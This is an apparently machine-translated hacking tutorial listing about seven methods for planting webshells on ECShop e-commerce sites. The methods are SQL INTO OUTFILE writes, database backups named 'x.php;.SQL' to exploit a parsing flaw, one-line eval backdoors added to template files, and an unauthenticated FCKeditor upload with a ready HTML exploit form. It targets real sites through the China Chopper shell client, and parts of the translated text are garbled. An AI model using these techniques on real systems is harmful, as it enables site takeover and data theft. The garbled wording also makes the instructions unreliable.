Ecshop background shell summary ecshop shell
I,
System ==> database management ==> SQL query (the physical path can be exposed ):
=================== Failed to create the table, shell =============================
Show databases; use Database Name; create a (cmd text not null); insert into a (cmd) values (''); select cmd from a into outfile 'export path '; drop table if exists;
=========================== Failed to create the table, shell ===============================
2. Leave a message on the front-end about a Trojan horse: Go to the background system ==> database management ==> data backup ==> select Custom backup, select the table ecs_feedback (the table storing the message)
Backup File Name: x. php;. SQL (an error occurred in the form of x. php. SQL. The connection to the kitchen knife fails)
Then the kitchen knife is linked successfully.
Http://www.baiduahck.com/data/sqldata/x.php;. SQL
III,
1. Add a member. insert a sentence to the member name: enter other words as needed. 2. System ==> database management ==> data backup-custom backup-select "XXX_users" (XXX varies by site and is the data prefix) 3. the backup file name is mm. php ;. SQL 4. Connect a single sentence client to mm. php ;. SQL, address is generally http://baiduhack.com/data/sqldata/mm.php;. SQL
IV ,(
Template management ==> database project management ==> select myship. lbi delivery method.
Add a line of code at the end of the file content: Kitchen Knife link http://www.baiduhack.com/myship.php successful.
Note: Some servers fail to filter eval.
V./shortdes/fckeditor/editor/filemanager/connectors/php/upload. php/shortdes/fckeditor/editor/filemanager/connectors/php/connector. php/shortdes/fckeditor/editor/filemanager/connectors/test.html
Http: // url/shortdes/fckeditor/editor/filemanager/connectors/test.html
There is no restriction on Media when the code is omitted. Direct Type = Media uploads your decrypted webshell access path
XXOO is not available if you do not log on to the background.
EXP:
<form id="frmUpload" enctype="multipart/form-data" action="/includes/fckeditor/editor/filemanager/connectors/php/upload.php?Type=Media" method="post">Upload a new file:<br><input type="file" name="NewFile" size="50"><br><input id="btnUpload" type="submit" value="Upload"></form> |
Upload PHP horse directly
The file address is:
/Images/upload/Media/xx. php
VI,
Upload a txt file without filtering any function. So I used php file operations... Insert the above Code into myship. ini in the library project management. Open http: // url/myship. php and generate a distant.php;a.txt kitchen knife connection under http: // url/data/directory... Done ..
7. Go to the backend-system settings-Flash Player management-directly upload x. php
This option is unavailable in ecshop V2.7.2.